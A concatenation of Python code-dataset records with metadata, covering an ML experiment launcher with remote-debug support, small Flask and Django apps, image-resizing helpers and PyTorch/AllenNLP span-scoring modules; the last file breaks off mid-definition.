keys = [\n (\"solution\", ),\n ]\n variant_levels.append(VariantLevel(keys, values, dir_names))\n\n values = [\n # [1, 1, int(1e10), 0.9],\n [24, 24, 1e-5, int(1e10), 0.9],\n # [20,20,5e-5, int(1e10), 0.9],\n ]\n dir_names = [\"train_spec-{}-{}-{}-{}\".format(*v[1:]) for v in values]\n keys = [\n (\"pretrain_dataloader_kwargs\", \"batch_size\"),\n (\"dataloader_kwargs\", \"batch_size\"),\n (\"algo_kwargs\", \"learning_rate\"),\n (\"algo_kwargs\", \"lr_max_iter\"),\n (\"algo_kwargs\", \"lr_power\"),\n ]\n variant_levels.append(VariantLevel(keys, values, dir_names))\n\n values = [\n # [None],\n [\"/root/VideoObjSeg/data/weightfiles/STM_pretrain_51.82-52.93.pkl\"],\n # [\"/root/VideoObjSeg/data/weightfiles/STM_fulltrain_62.84-66.74.pkl\"],\n # [\"/root/VideoObjSeg/data/weightfiles/EMN_pretrain_54.50-59.29.pkl\"],\n ]\n dir_names = [(\"pretrainFalse\" if i[0] is None else \"pretrainTrue\") for i in values]\n keys = [\n (\"pretrain_snapshot_filename\", ),\n ]\n variant_levels.append(VariantLevel(keys, values, dir_names))\n\n variants, log_dirs = make_variants(*variant_levels)\n for i, variant in enumerate(variants):\n variants[i] = update_config(default_config, variant)\n if args.debug > 0:\n # make sure each complete iteration has gone through and easy for debug\n variants[i][\"runner_kwargs\"][\"pretrain_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"max_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"eval_interval\"] = 2\n variants[i][\"runner_kwargs\"][\"log_interval\"] = 4\n variants[i][\"pretrain_dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"pretrain_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"eval_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"random_subset_kwargs\"][\"subset_len\"] = 2\n \n run_experiments(\n script=\"vos/experiments/videoSeg.py\",\n affinity_code=affinity_code,\n experiment_title=experiment_title+(\"--debug\" if args.debug else \"\"),\n runs_per_setting=1,\n variants=variants,\n log_dirs=log_dirs,\n debug_mode=args.debug,\n )\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--debug', help= 'A common setting of whether to entering debug mode for remote attach',\n type= int, default= 0,\n )\n\n args = parser.parse_args()\n if args.debug > 0:\n # configuration for remote attach and debug\n import ptvsd\n import sys\n ip_address = ('0.0.0.0', 5050)\n print(\"Process: \" + \" \".join(sys.argv[:]))\n print(\"Is waiting for attach at address: %s:%d\" % ip_address, flush= True)\n # Allow other computers to attach to ptvsd at this IP address and port.\n ptvsd.enable_attach(address=ip_address,)\n # Pause the program until a remote debugger is attached\n ptvsd.wait_for_attach()\n print(\"Process attached, start running into experiment...\", flush= True)\n ptvsd.break_into_debugger()\n\n main(args)\n", "sub_path": "vos/experiments/launch_maintrain_vos.py", "file_name": "launch_maintrain_vos.py", "file_ext": "py", "file_size_in_byte": 4097, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "exptools.launching.affinity.encode_affinity", "line_number": 13, "usage_type": "call"}, {"api_name": "vos.experiments.launch_pretrain_vos.get_default_config", "line_number": 18, "usage_type": "call"}, {"api_name": "exptools.launching.variant.VariantLevel", "line_number": 32, "usage_type": "call"}, {"api_name": "exptools.launching.variant.VariantLevel", "line_number": 47, "usage_type": "call"}, {"api_name": "exptools.launching.variant.VariantLevel", "line_number": 59, "usage_type": "call"}, {"api_name": "exptools.launching.variant.make_variants", "line_number": 61, "usage_type": "call"}, {"api_name": "exptools.launching.variant.update_config", "line_number": 63, "usage_type": "call"}, {"api_name": "exptools.launching.exp_launcher.run_experiments", "line_number": 77, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 102, "usage_type": "attribute"}, {"api_name": "ptvsd.enable_attach", "line_number": 105, "usage_type": "call"}, {"api_name": "ptvsd.wait_for_attach", "line_number": 107, "usage_type": "call"}, {"api_name": "ptvsd.break_into_debugger", "line_number": 109, "usage_type": "call"}]} {"seq_id": "283343219", "text": "from flask import Response, request\nfrom database.sucursal import Sucursal\nfrom flask_restful import Resource\n\nclass SucursalApi(Resource):\n def get(self):\n agencies = Sucursal.objects().to_json()\n return Response(agencies, mimetype=\"application/json\", status=200)\n\n def post(self):\n body = request.get_json()\n agency = Sucursal(**body).save()\n id = agency.id\n return {'id': str(id)}, 200\n", "sub_path": "resources/sucursal.py", "file_name": "sucursal.py", "file_ext": "py", "file_size_in_byte": 437, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "flask_restful.Resource", "line_number": 5, "usage_type": "name"}, {"api_name": "database.sucursal.Sucursal.objects", "line_number": 7, "usage_type": "call"}, {"api_name": "database.sucursal.Sucursal", "line_number": 7, "usage_type": "name"}, {"api_name": "flask.Response", "line_number": 8, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "database.sucursal.Sucursal", "line_number": 12, "usage_type": "call"}]} {"seq_id": "573649687", "text": "import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tango_with_django.settings')\n\nimport django\ndjango.setup()\nfrom rango.models import Category, Page\n\ndef populate():\n\n python_pages = [\n {\"title\": \"Official Python Tutorial\", \"url\": \"http://docs.python.org\"},\n {\"title\": \"How to be a computer scientist\", \"url\": \"http://www.somebullshit.com\"},\n {\"title\": \"Learn Python in 10 mins\", \"url\": \"http://www.korokithakis.net\"}\n ]\n\n django_pages = [\n {\"title\": \"Official Django Tutorial\", \"url\": \"http://docs.djangoproject.com\"},\n {\"title\": \"Django Rocks\", \"url\": \"http://www.djangorocks.com\"},\n {\"title\": \"Tango with Djano\", \"url\": \"http://www.tangowithdjango.com\"}\n ]\n\n other_pages = [\n {\"title\": \"Volvic\", \"url\": \"http://www.volvic.com\"},\n {\"title\": \"Facebook\", \"url\": \"http://www.facebook.com\"}\n ]\n\n cats = {\"Python\": {\"pages\": python_pages,\"views\": 128, \"likes\": 64}, \"Django\": {\"pages\": django_pages, \"views\": 64, \"likes\":32}, \"Random\": {\"pages\": other_pages, \"views\":32,\"likes\":16}}\n\n for cat, cat_data in cats.items():\n c = add_cat(cat, cat_data[\"views\"],cat_data[\"likes\"])\n for p in cat_data[\"pages\"]:\n add_page(c, p[\"title\"], p[\"url\"])\n\n for c in Category.objects.all():\n for p in Page.objects.filter(category=c):\n print(\"- {0} - {1}\".format(str(c), str(p)))\n\ndef add_page(cat, title, url, views=0):\n\n p = Page.objects.get_or_create(category=cat, title=title)[0]\n p.url=url\n p.views=views\n p.save()\n return p\n\ndef add_cat(name, views, likes):\n c = Category.objects.get_or_create(name=name)[0]\n c.views=views\n c.likes=likes\n c.save()\n return c\n\n\nif __name__=='__main__':\n print (\"Starting populate scrupt\")\n populate()\n", "sub_path": "populate_rango.py", "file_name": "populate_rango.py", "file_ext": "py", "file_size_in_byte": 1790, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "os.environ.setdefault", "line_number": 3, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 3, "usage_type": "attribute"}, {"api_name": "django.setup", "line_number": 6, "usage_type": "call"}, {"api_name": "rango.models.Category.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "rango.models.Category.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rango.models.Category", "line_number": 35, "usage_type": "name"}, {"api_name": "rango.models.Page.objects.filter", "line_number": 36, "usage_type": "call"}, {"api_name": "rango.models.Page.objects", "line_number": 36, "usage_type": "attribute"}, {"api_name": "rango.models.Page", "line_number": 36, "usage_type": "name"}, {"api_name": "rango.models.Page.objects.get_or_create", "line_number": 41, "usage_type": "call"}, {"api_name": "rango.models.Page.objects", "line_number": 41, "usage_type": "attribute"}, {"api_name": "rango.models.Page", "line_number": 41, "usage_type": "name"}, {"api_name": "rango.models.Category.objects.get_or_create", "line_number": 48, "usage_type": "call"}, {"api_name": "rango.models.Category.objects", "line_number": 48, "usage_type": "attribute"}, {"api_name": "rango.models.Category", "line_number": 48, "usage_type": "name"}]} {"seq_id": "23605552", "text": "from scipy.misc.pilutil import imresize\n\n__author__ = 'peter'\n\n\ndef resize_while_preserving_aspect_ratio(im, x_dim=None, y_dim=None):\n \"\"\"\n Resize an image, while preserving the aspect ratio. For this you need to specify either x_dim or y_dim.\n\n :param im: The image: a 2D or 3D array.\n :param x_dim: An integer indicating the desired size, or None, to leave it loose.\n :param y_dim: An integer indicating the desired size, or None, to leave it loose.\n :return: A new image whose x_dim or y_dim matches the constraint\n \"\"\"\n assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n\n x_dim = float('inf') if x_dim is None else x_dim\n y_dim = float('inf') if y_dim is None else y_dim\n\n box_aspect_ratio = x_dim/float(y_dim)\n image_aspect_ratio = im.shape[1] / float(im.shape[0])\n if image_aspect_ratio > box_aspect_ratio: # Active constraint is width\n return imresize(im, size=(int(x_dim/image_aspect_ratio+.5), x_dim))\n else: # Active constraint is height\n return imresize(im, size=(y_dim, int(y_dim*image_aspect_ratio+.5)))\n\n\ndef equalize_image_dims(list_of_images, x_dim = None, y_dim = None):\n \"\"\"\n Resize images so that they match roughly in size although their aspect ratio will be preserved.\n :param list_of_images: A list of numpy arrays representing images (2D or 3D arrays)\n :param size: A 2-tuple specifying the desired (y_size, x_size).\n Each of (y_size, x_size) can be:\n - An integar, meaning that this axis of the image will remain equal or smaller than this number of pixels.\n - None, meaning that there is no constraint along this axis (e.g. (224, None) just states that the image will be\n scaled to 224 pixels in the vertical direction - the horizontal will be whatever size is needed to maintain\n the aspect ratio.\n - 'max': Meaning that we take the largest image size along this axis.\n - 'min': Meaning what we take the largest image size along this axis.\n\n The image will then be scaled so that the image size remains inside this box (although, unless the aspect ratio\n matches exactly, one dimension will be smaller).\n\n :return: Another list of images.\n \"\"\"\n assert not (x_dim is None and y_dim is None), 'You can not leave both constraints at None!'\n if len(list_of_images)==0:\n return []\n x_dim = max(im.shape[1] for im in list_of_images) if x_dim=='max' else \\\n min(im.shape[1] for im in list_of_images) if x_dim=='min' else \\\n x_dim\n y_dim = max(im.shape[0] for im in list_of_images) if y_dim=='max' else \\\n min(im.shape[0] for im in list_of_images) if y_dim=='min' else \\\n y_dim\n new_list_of_images = [resize_while_preserving_aspect_ratio(im, x_dim=x_dim, y_dim=y_dim) for im in list_of_images]\n return new_list_of_images\n", "sub_path": "artemis/general/image_ops.py", "file_name": "image_ops.py", "file_ext": "py", "file_size_in_byte": 2878, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "scipy.misc.pilutil.imresize", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.misc.pilutil.imresize", "line_number": 25, "usage_type": "call"}]} {"seq_id": "484648432", "text": "\nfrom flask import Flask, redirect\nfrom flask import url_for\nimport os\napp = Flask(__name__, static_folder=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test')\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\nfp=r'C:\\Users\\matth\\Documents\\Projects\\Family-Pic-Receiver\\Test'\n\nclass overallData:\n counter = 0\n\ndataHold = overallData()\n\n@app.route('/')\ndef displayImg():\n dataHold.counter += 1\n for counter,file in enumerate(os.listdir(fp)):\n if counter+1 == dataHold.counter:\n try:\n print(file)\n img_url = url_for('static',filename=file)\n return redirect(img_url)\n except:\n return '

    Sad

    '\n return '

    Sorry

    '\n\nif __name__ == '__main__':\n app.run(port=8080,debug=True)\n", "sub_path": "PicDisp/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 24, "usage_type": "call"}]} {"seq_id": "309222404", "text": "\r\nimport logging\r\nfrom collections import OrderedDict\r\nimport torch\r\nimport torch.nn as nn\r\n\r\nfrom torch.nn.modules.activation import Sigmoid, ReLU\r\n\r\nfrom allennlp.modules.conditional_random_field import ConditionalRandomField\r\nfrom allennlp.modules import FeedForward\r\nfrom allennlp.modules.span_extractors import SelfAttentiveSpanExtractor\r\nfrom allennlp.modules.span_extractors import EndpointSpanExtractor\r\nfrom allennlp.modules import TimeDistributed, Pruner\r\nfrom allennlp.nn import util\r\n\r\n\r\nfrom pytorch_models.utils import one_hot, get_activation_fn\r\nfrom pytorch_models.utils import map_dict_builder\r\nfrom pytorch_models.utils import create_mask, map_dict_builder\r\nfrom pytorch_models.training import get_entity_loss\r\n\r\nclass SpanEmbedder(nn.Module):\r\n '''\r\n Create span embeddings\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, 2)\r\n \r\n '''\r\n def __init__(self, input_dim, \\\r\n use_endpoint = True, \r\n use_attention = True,\r\n combination = \"x,y\",\r\n num_width_embeddings = None,\r\n span_width_embedding_dim = None,\r\n span_end_is_exclusive = True):\r\n \r\n super(SpanEmbedder, self).__init__()\r\n \r\n self.input_dim = int(input_dim)\r\n self.use_endpoint = bool(use_endpoint)\r\n self.use_attention = bool(use_attention)\r\n self.combination = str(combination)\r\n \r\n if span_width_embedding_dim is None:\r\n self.num_width_embeddings = None\r\n feat_size = 0\r\n else:\r\n self.num_width_embeddings = num_width_embeddings\r\n feat_size = span_width_embedding_dim\r\n \r\n self.span_width_embedding_dim = span_width_embedding_dim\r\n self.span_end_is_exclusive = bool(span_end_is_exclusive)\r\n\r\n # Endpoint extractor\r\n if self.use_endpoint:\r\n self._endpoint_extractor = EndpointSpanExtractor( \\\r\n input_dim = self.input_dim,\r\n combination = self.combination,\r\n num_width_embeddings = self.num_width_embeddings,\r\n span_width_embedding_dim = self.span_width_embedding_dim,\r\n bucket_widths = False)\r\n \r\n # Self-attentive span extractor\r\n if self.use_attention:\r\n self._attentive_extractor = \\\r\n SelfAttentiveSpanExtractor(input_dim=self.input_dim)\r\n\r\n # Dimensionality of span/Input dimension for FFNN\r\n a = len(self.combination.split(','))*int(self.use_endpoint)\r\n b = int(self.use_attention)\r\n self.output_dim = self.input_dim*(a + b) + feat_size\r\n\r\n # Placeholder for decrement in span end index\r\n self.span_offset = None\r\n\r\n\r\n def forward(self, sequence_tensor, sequence_mask, \r\n span_indices, span_mask):\r\n '''\r\n Parameters\r\n ----------\r\n sequence_tensor: sequence representation (batch_size, seq_len, embed_dim)\r\n sequence_mask: sequence mask (batch_size, seq_len)\r\n span_indices: tensor of span indices (batch_size, span_num, 2)\r\n span_mask: tensor of mask (batch_size, trig_num)\r\n \r\n Returns\r\n ------- \r\n span_embed: tensor of span embeddings (batch_size, span_num, output_dim) \r\n '''\r\n \r\n # If span end indices are exclusive, subtract 1\r\n if self.span_end_is_exclusive:\r\n \r\n # Initialize span offset (decrement end indices)\r\n if (self.span_offset is None) or \\\r\n (self.span_offset.shape != span_indices.shape):\r\n \r\n self.span_offset = torch.zeros_like(span_indices, \\\r\n requires_grad=False) \r\n self.span_offset[:,:,1] = - 1\r\n \r\n # Apply offset\r\n span_indices = span_indices + self.span_offset\r\n\r\n # Initialize output\r\n span_embed = []\r\n \r\n # Endpoint embedding\r\n if self.use_endpoint:\r\n span_embed.append(self._endpoint_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n # Attentive embedding\r\n if self.use_attention:\r\n span_embed.append(self._attentive_extractor( \\\r\n sequence_tensor = sequence_tensor,\r\n span_indices = span_indices,\r\n sequence_mask = sequence_mask,\r\n span_indices_mask = span_mask))\r\n \r\n return torch.cat(span_embed, dim=2)\r\n\r\n\r\ndef span_labels_to_scores(labels, mask, num_tags, low_val, high_val, pruner):\r\n '''\r\n Use gold labels or CRF-predicted labels to generate label scores\r\n '''\r\n \r\n # Create binary, indicator labels\r\n binary_labels = (labels > 0).type(torch.FloatTensor)\r\n binary_labels = binary_labels.to(labels.device)\r\n\r\n # Number of elements to keep\r\n num_items_to_keep = max(int(binary_labels.sum(1).max()), 1)\r\n\r\n # Add dimension to binary labels so it can be treated as an embedding\r\n embeddings = binary_labels.unsqueeze(-1)\r\n\r\n # Get spans with positive labels\r\n _, mask_top, indices_top, prune_scores_top = \\\r\n pruner(embeddings, mask, num_items_to_keep)\r\n prune_scores_top = prune_scores_top.squeeze(-1) \r\n \r\n # Span scores\r\n label_scores = one_hot(labels, num_tags, \\\r\n low_val = low_val, \r\n high_val = high_val)\r\n\r\n # Top span scores\r\n label_scores_top = util.batched_index_select( \\\r\n target = label_scores, \r\n indices = indices_top)\r\n\r\n return (mask_top, indices_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass PassThrough(nn.Module):\r\n '''\r\n Simple pass-through \r\n '''\r\n def __init__(self):\r\n super(PassThrough, self).__init__()\r\n \r\n def forward(self, x):\r\n return x\r\n \r\nclass SpanScorerGold(nn.Module):\r\n '''\r\n Span scorer using gold labels\r\n Convert labels to one hot encoding\r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, num_tags, low_val=-5, high_val=5):\r\n super(SpanScorerGold, self).__init__()\r\n \r\n self.num_tags = num_tags\r\n self.low_val = low_val\r\n self.high_val = high_val\r\n\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n\r\n def forward(self, labels, mask, embed):\r\n '''\r\n Parameters\r\n ----------\r\n span_labels: tensor of labels (batch_size, num_spans)\r\n \r\n Returns\r\n -------\r\n Pulled from AllenNLP GitHub:\r\n https://github.com/allenai/allennlp/blob/master/allennlp/modules/pruner.py\r\n \r\n embed_top : ``torch.FloatTensor``\r\n The representations of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, embedding_size).\r\n mask_top : ``torch.LongTensor``\r\n The corresponding mask for ``embed_top``.\r\n Has shape (batch_size, num_items_to_keep).\r\n indices_top : ``torch.IntTensor``\r\n The indices of the top-k scoring items into the original ``embeddings``\r\n tensor. This is returned because it can be useful to retain pointers to\r\n the original items, if each item is being scored by multiple distinct\r\n scorers, for instance. Has shape (batch_size, num_items_to_keep).\r\n top_item_scores : ``torch.FloatTensor``\r\n The values of the top-k scoring items.\r\n Has shape (batch_size, num_items_to_keep, 1).\r\n '''\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = labels, \r\n mask = mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n\r\n \r\n return (indices_top, embed_top, mask_top, prune_scores_top, label_scores_top)\r\n\r\n\r\nclass SpanScorerCRF(nn.Module):\r\n '''\r\n Span extractor\r\n '''\r\n def __init__(self, embed_size, label_map,\r\n low_val = -5, \r\n high_val = 5, \r\n constraints = None,\r\n incl_start_end = True,\r\n ):\r\n super(SpanScorerCRF, self).__init__()\r\n\r\n self.embed_size = embed_size\r\n self.label_map = label_map\r\n self.low_val = low_val\r\n self.high_val = high_val \r\n self.constraints = constraints\r\n self.incl_start_end = incl_start_end\r\n \r\n # Number of positive tags\r\n self.num_pos_tags = len(label_map[1:])\r\n \r\n # label_map to/from BIO (0th label is negative)\r\n self.mapping_BIO = label_map[:] + label_map[1:]\r\n \r\n # Dicts for mapping to/from label indices\r\n self.label_to_id, self.id_to_label = \\\r\n map_dict_builder(self.mapping_BIO)\r\n \r\n # Number of tags, including BI prefixes \r\n self.num_tags = len(self.mapping_BIO)\r\n \r\n # Linear projection layer\r\n self.projection = nn.Linear(embed_size, self.num_tags)\r\n \r\n # Create event-specific CRF\r\n self.crf = ConditionalRandomField( \\\r\n num_tags = self.num_tags, \r\n constraints = constraints,\r\n include_start_end_transitions = incl_start_end) \r\n\r\n # Dummy pruner\r\n scorer = TimeDistributed(PassThrough())\r\n self._pruner = Pruner(scorer)\r\n\r\n def forward(self, seq_tensor, seq_mask, span_map, span_mask, embed, spans, \\\r\n span_labels=None):\r\n '''\r\n Generate predictions\r\n '''\r\n # Dimensionality\r\n batch_size, max_seq_len, input_dim = tuple(seq_tensor.shape)\r\n\r\n # Project input tensor sequence to logits\r\n logits = self.projection(seq_tensor)\r\n \r\n # Best path\r\n best_paths = self.crf.viterbi_tags( \\\r\n logits = logits, \r\n mask = seq_mask)\r\n \r\n # Separate predictions and score\r\n seq_pred, score = zip(*best_paths)\r\n seq_pred = list(seq_pred)\r\n\r\n '''\r\n Process predictions\r\n '''\r\n # Get spans from sequence tags\r\n # Converts list of list of predicted label indices to\r\n # tensor of size (batch_size, num_spans)\r\n span_pred = self._seq_tags_to_spans(seq_pred, span_map)\r\n\r\n # Get scores from labels\r\n mask_top, indices_top, prune_scores_top, label_scores_top, \\\r\n = span_labels_to_scores( \\\r\n labels = span_pred, \r\n mask = span_mask, \r\n num_tags = self.num_tags, \r\n low_val = self.low_val, \r\n high_val = self.high_val,\r\n pruner = self._pruner)\r\n\r\n # Get top embeddings\r\n embed_top = util.batched_index_select(embed, indices_top)\r\n \r\n '''\r\n Calculate loss\r\n '''\r\n # No labels provided\r\n if span_labels is None:\r\n loss = None\r\n \r\n # Span labels provided (i.e. training)\r\n else: \r\n # Convert span representation to sequence tags \r\n seq_true = self._spans_to_seq_tags(span_labels, spans, \r\n max_seq_len)\r\n # Get loss (negative log likely)\r\n loss = -self.crf( \\\r\n inputs = logits, \r\n tags = seq_true, \r\n mask = seq_mask)\r\n\r\n \r\n \r\n return (embed_top, mask_top, indices_top, prune_scores_top, \r\n label_scores_top, loss)\r\n\r\n def _to_BIO(self, span_label, start, end):\r\n '''\r\n Convert span representation to BIO representation\r\n \r\n Parameters\r\n ----------\r\n span_label: scaler tensor, span label index\r\n start: scaler tensor, span start index\r\n end: scaler tensor, span end index\r\n \r\n '''\r\n \r\n # Span length\r\n n = end - start\r\n\r\n # Inside label \r\n I = span_label + self.num_pos_tags\r\n \r\n # Initialize to inside label\r\n seq_labels = torch.zeros(n).type(torch.LongTensor) \r\n seq_labels.fill_(I)\r\n \r\n # Begin label\r\n seq_labels[0] = span_label\r\n\r\n #REMOVE\r\n #seq_labels.fill_(span_label)\r\n\r\n return seq_labels \r\n\r\n def _from_BIO(self, seq_label):\r\n '''\r\n Convert BIO representation to span representation\r\n \r\n Parameters\r\n ----------\r\n seq_label: int, span label with BIO indices\r\n '''\r\n \r\n \r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.tag_to_span_lab \")\r\n logging.warn(\"=\"*300)\r\n \r\n \r\n \r\n is_outside = 0\r\n is_begin = 0\r\n is_inside = 0\r\n \r\n # Convert sequence label to span label (i.e. convert BI)\r\n if seq_label > self.num_pos_tags:\r\n span_label = seq_label - self.num_pos_tags\r\n is_inside = 1\r\n elif seq_label > 0:\r\n span_label = seq_label\r\n is_begin = 1\r\n else:\r\n span_label = seq_label\r\n is_outside = 1\r\n \r\n return (span_label, is_outside, is_begin, is_inside)\r\n\r\n\r\n\r\n def _seq_tags_to_spans(self, seq_tags, span_map):\r\n '''\r\n Convert sequence tags to span labels\r\n \r\n Parameters\r\n ----------\r\n seq_tags: list of list of label indices\r\n i.e. list of sentences, where each sentence \r\n is a list of label indices\r\n \r\n Returns\r\n -------\r\n span_labels: tensor of shape (batch_size, num_spans)\r\n \r\n '''\r\n\r\n # Get inputs for tensor initialization\r\n batch_size = len(seq_tags)\r\n num_spans = len(span_map)\r\n\r\n # Initialize span labels to null label\r\n span_labels = torch.zeros(batch_size, num_spans).type( \\\r\n torch.LongTensor)\r\n \r\n # Loop on sequences\r\n for i_seq, seq in enumerate(seq_tags):\r\n \r\n # Loop on spans\r\n for lab, start, end in self._BIO_to_span(seq):\r\n \r\n # Token indices of current span\r\n idx = (start, end)\r\n \r\n # Span in map\r\n if idx in span_map:\r\n\r\n # Span index within tensor\r\n i_span = span_map[idx]\r\n \r\n # Update label tensor\r\n span_labels[i_seq, i_span] = lab\r\n \r\n # Span not in map\r\n else:\r\n pass\r\n logging.warn(\"span not in map:\\t{}\".format(idx))\r\n\r\n \r\n return span_labels\r\n\r\n\r\n def _spans_to_seq_tags(self, labels, spans, max_seq_len):\r\n '''\r\n Convert span labels to sequence labels\r\n \r\n \r\n Parameters\r\n ----------\r\n labels: tensor of label indices (batch_size, num_spans)\r\n spans: tensor of span indices (batch_size, num_spans, 2)\r\n max_seq_len: int, maximum sequence length\r\n num_pos_tags: int, number of non-negative labels\r\n \r\n Returns\r\n -------\r\n seq_tags: tensor with BIO label indices (batch_size, max_seq_len)\r\n '''\r\n \r\n \r\n # Label dimensionality\r\n batch_size, num_spans = tuple(labels.shape)\r\n \r\n # Initialize sequence tags to 0\r\n # (batch_size, max_seq_len)\r\n seq_tags = torch.zeros(batch_size, max_seq_len).type( \\\r\n torch.LongTensor)\r\n\r\n # Find indices of all nonnegative (0) labels\r\n # (n, d) \r\n # n = number of nonzero elements, \r\n # d = number of dimensions in labels (i.e. 2)\r\n non_neg_indices = torch.nonzero(labels)\r\n \r\n # Iterate over nonnegative labels\r\n for indices in non_neg_indices:\r\n\r\n # Sequence and span indices \r\n # indices_shape (2)\r\n i_seq = indices[0]\r\n i_span = indices[1]\r\n\r\n # Label \r\n # (1)\r\n lab = labels[i_seq, i_span]\r\n \r\n # Span start and stop indices\r\n # (2)\r\n span = spans[i_seq, i_span]\r\n start = span[0]\r\n end = span[1]\r\n\r\n # Update sequence tags with BI labels\r\n seq_tags[i_seq, start:end] = self._to_BIO(lab, start, end)\r\n \r\n return seq_tags\r\n\r\n\r\n def _BIO_to_span(self, seq):\r\n '''\r\n \r\n Finds spans in BIO sequence\r\n \r\n NOTE: start span index is inclusive, end span index is exclusive\r\n e.g. like Python lists\r\n \r\n '''\r\n\r\n\r\n \r\n logging.warn(\"=\"*300)\r\n logging.warn(\"TODO replace this fucntion with pytorch_models.crf.BIO_to_span\")\r\n logging.warn(\"=\"*300) \r\n\r\n spans = []\r\n begin_count = 0\r\n start = -1\r\n end = -1\r\n active_tag = None\r\n \r\n if not any(seq):\r\n return []\r\n\r\n for i_tok, x in enumerate(seq):\r\n \r\n \r\n # Convert current sequence tag label to span label\r\n tag, is_outside, is_begin, is_inside = self._from_BIO(x)\r\n \r\n # Outside label\r\n if is_outside:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n # Span beginning\r\n elif is_begin:\r\n \r\n # The span has ended\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Update active tag\r\n active_tag = tag\r\n \r\n # Index of current span start\r\n start = i_tok\r\n end = i_tok + 1\r\n \r\n # Increment begin count\r\n begin_count += 1\r\n \r\n # Span inside and current tag matches active tag\r\n # e.g. well-formed span\r\n elif is_inside and (tag == active_tag):\r\n end += 1\r\n \r\n # Ill formed span\r\n elif is_inside and (tag != active_tag):\r\n\r\n # Capture end of valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Not in a span\r\n active_tag = None\r\n \r\n else:\r\n raise ValueError(\"could not assign label\")\r\n \r\n # Last token might be part of a valid span\r\n if active_tag is not None:\r\n spans.append((active_tag, start, end))\r\n\r\n # Get span count \r\n span_count = len(spans)\r\n \r\n if True and (begin_count != span_count):\r\n msg = \\\r\n '''Count mismatch:\r\n seq = {}\r\n Begin count = {}\r\n span count = {}'''.format(seq, begin_count, span_count)\r\n logging.warn(msg)\r\n\r\n return spans\r\n\r\nclass BeamScorer(nn.Module):\r\n '''\r\n \r\n '''\r\n def __init__(self, scorer, agg_type):\r\n super(BeamScorer, self).__init__()\r\n self._scorer = scorer \r\n self.agg_type = agg_type\r\n\r\n def forward(self, candidates):\r\n \r\n # Apply scorer\r\n # [batch_size, n_spans, n_labels]\r\n scores = self._scorer(candidates)\r\n \r\n # Get overall score for non-null (positive) labels\r\n # Null labels represented by label index 0\r\n if self.agg_type == 'max':\r\n pos_scores, _ = scores[:,:,1:].max(dim=-1)\r\n elif self.agg_type == 'sum':\r\n pos_scores = scores[:,:,1:].sum(dim=-1)\r\n else:\r\n raise ValueError(\"incorrect agg_type: {}\".format(self.agg_type))\r\n \r\n # Add last dimension for compliance with Pruner API\r\n # [batch_size, n_spans, 1]\r\n return pos_scores.unsqueeze(-1)\r\n\r\nclass SpanScorerPrune(nn.Module):\r\n '''\r\n Span scorer \r\n \r\n \r\n Parameters\r\n ----------\r\n num_tags: label vocab size\r\n \r\n \r\n Returns\r\n -------\r\n arg_scores: tensor of scores (batch_size, trig_num, arg_num, num_tags)\r\n \r\n '''\r\n def __init__(self, input_dim, hidden_dim, num_tags, \\\r\n activation = 